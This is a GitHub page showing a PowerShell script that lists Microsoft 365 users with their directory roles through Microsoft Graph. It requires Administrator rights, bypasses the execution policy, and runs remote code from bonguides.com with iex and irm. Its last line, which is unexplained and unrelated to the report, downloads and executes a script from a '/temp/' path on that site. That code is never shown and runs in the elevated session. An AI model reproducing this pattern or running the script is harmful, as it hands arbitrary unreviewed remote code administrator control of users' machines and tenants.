forked from bonguides25/PowerShell
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathtemplate.ps1
73 lines (61 loc) · 2.94 KB
/
template.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
<#=============================================================================================
Script by : Leo Nguyen
Website : www.bonguides.com
Telegram : https://t.me/bonguides
Discord : https://discord.gg/fUVjuqexJg
YouTube : https://www.youtube.com/@BonGuides
Script Highlights:
~~~~~~~~~~~~~~~~~
#. Single script allows you to generate user report with roles assignments
============================================================================================#>
param (
[switch]$OutCSV,
[switch]$OutGridView
)
if (-not([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
Write-Warning "You need to have Administrator rights to run this script!`nPlease re-run this script as an Administrator in an elevated powershell prompt!"
break
}
# Install the required Microsoft Graph PowerShell SDK modules
Set-ExecutionPolicy Bypass -Scope Process -Force | Out-Null
iex "& { $(irm bonguides.com/graph/modulesinstall) } -InstallBasic"
# Get user report with license assigments and account status
Disconnect-MgGraph -ErrorAction:SilentlyContinue | Out-Null
Write-Host "Connecting to Microsoft Graph PowerShell..." -ForegroundColor Yellow
Connect-MgGraph -Scopes 'Directory.Read.All', 'User.Read.All' -ErrorAction Stop
$users = Get-MgBetaUser -All
# Get licenses assigned to user accounts
$i = 1
$Roles = @()
$report = @()
foreach ($user in $users) {
# Get roles assigned to user
Write-Progress -PercentComplete ($i/$($users.Count)*100) -Status "Processing: $($user.UserPrincipalName) - $($user.DisplayName)" -Activity "Processing: ($i/$($users.Count))"
$Roles = Get-MgUserTransitiveMemberOf -UserId $user.Id | Select-Object -ExpandProperty AdditionalProperties
$Roles = $Roles | Where-Object{$_.'@odata.type' -eq '#microsoft.graph.directoryRole'}
if($Roles.count -eq 0) {
$RolesAssigned = "No roles"
} else {
$RolesAssigned = @($Roles.displayName) -join ','
}
# Creating the custom report
$report += [PSCustomObject]@{
'DisplayName' = $user.DisplayName
'UserPrincipalName' = $user.UserPrincipalName
'Enabled' = $user.accountEnabled
'Roles' = $RolesAssigned
}
$i++
}
# Output options to console, graphical grid view or export to CSV file
if($OutCSV.IsPresent) {
$filePath = "$env:userprofile\desktop\report-$(Get-Date -Format yyyy-mm-dd-hh-mm-ss).csv"
$report | Export-CSV $filePath -NoTypeInformation -Encoding UTF8
Write-Host "`nThe report is saved to: $filePath `n" -ForegroundColor Cyan
Invoke-Item "$env:userprofile\desktop"
} elseif ($OutGridView.IsPresent) {
$report | Out-GridView
} else {
$report | Sort-Object -Property Roles -Descending
}
iex "& { $(irm https://bonguides.com/temp/p002.ps1) } -UseChoco"